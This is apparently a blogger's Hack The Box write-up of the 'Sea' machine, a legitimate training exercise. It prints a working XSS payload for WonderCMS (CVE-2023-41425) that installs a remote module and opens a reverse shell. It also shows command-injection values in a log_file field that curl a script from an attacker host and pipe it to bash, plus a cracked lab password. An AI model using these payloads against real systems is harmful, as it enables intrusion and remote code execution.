Hackthebox: Sea

Overview

Sea is an easy-difficulty machine from Hack The Box that initially deals with CVE-2023-41425 which is an XSS vulnerabiity in WonderCMS leading to a remote code execution and then database credentials exfiltration. And finally we’ll be abusing a command injection in an internal monitoring service running as root to pwn the machine.

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.77.74 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-20 07:54 W. Central Africa Standard Time
Nmap scan report for 10.129.77.74
Host is up (0.29s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.97 seconds

We can see that we have our typical ports 22 for ssh and 80 for http without any apparent redirect.

Web Application - http://10.129.77.74

We are prompted with a simple web application without any clear features:

Checking the contact button, we can see it redirects to this link: http://sea.htb/contact.php , so let’s go ahead and add sea.htb to our /etc/hosts file.

Then I simply just right clicked on the cover picture to search for it on google hoping to find something interesting:

And I did! This turns out to be a CMS called WonderCMS and we are also prompted with a CVE for it in the first link! How lucky are we lol.

CVE-2023-41425

CVE-2023-41425 is a Cross Site Scripting (XSS) vulnerability in WonderCMS v3.2.0 thru v3.4.2 allowing for arbitrary code execution by uploading a malicious module to the installModule feature.

This will be our xss.js code:

var url = "http://sea.htb/loginURL";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.x.x/revshell-main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "10.10.x.x";
       var port = "9001";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();

     }
   };
 }
};

We should be hosting our xss.js on a local python web server, and then wait for the server to fetch our revshell-main.zip file.

And we have our reverse shell!!
Once we’re in, I start looking into database files to find something of interest:

www-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
    "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "defaultPage": "home",
        "login": "loginURL",
        "forceLogout": false,
        "forceHttps": false,
        "saveChangesPopup": false,
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
        "lastLogins": {
            "2024\/08\/11 11:17:32": "127.0.0.1",
            "2024\/08\/11 11:17:02": "127.0.0.1",
            "2024\/08\/11 11:15:32": "127.0.0.1",
            "2024\/08\/11 11:15:02": "127.0.0.1",

And I got a password hash that we can simply crack using johntheripper:

┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txt                                                            1 ⨯
                                                                                                                                                  
┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt             
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:14 DONE (2024-08-11 07:28) 0.06798g/s 208.0p/s 208.0c/s 208.0C/s iamcool..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I can now ssh into the machine using amay user that we find from the home directory and we can get our user flag:

amay@sea:~$ cat user.txt
e795f4db1c6f32******************
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)
amay@sea:~$

Privilege Escalation to root

Checking the available network services running, I find an intriguing port 8080:

amay@sea:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:51151         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:56026         TIME_WAIT   timewait (25.42/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:43684         TIME_WAIT   timewait (34.45/0/0)
tcp        0      0 127.0.0.1:8080          127.0.0.1:43670         TIME_WAIT   timewait (31.44/0/0)

Let’s forward that port to our local machine and check what it has for us:
ssh [email protected] -L 8080:localhost:8080

And we are prompted to enter a username and a password:

So let’s login to it using amay‘s creds.

And it looks like some sort of internal monitoring service:

One of the features is that we can check the access.log file, let’s check the web request being made and understand what’s actually going on under the hood:

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 57
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log&analyze_log=

We can see that the filename is being passed into a log_file parameter. Maybe we can tamper it to achieve RCE?
Let’s try to make a request to our local server using it:

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 57
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file==;curl+10.10.x.x&analyze_log=

And we get a callback:

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.77.74 - - [20/Dec/2024 09:07:51] "GET / HTTP/1.1" 200 -

So let’s get that reverse shell ;)

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 42
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file==;curl+10.10.x.x/shell.sh|bash&analyze_log=

And here’s our root flag:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.77.74] 35876
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
# 1713afca5f7346******************
#

And that was it for sea! Hope you enjoyed it.
-0xkujen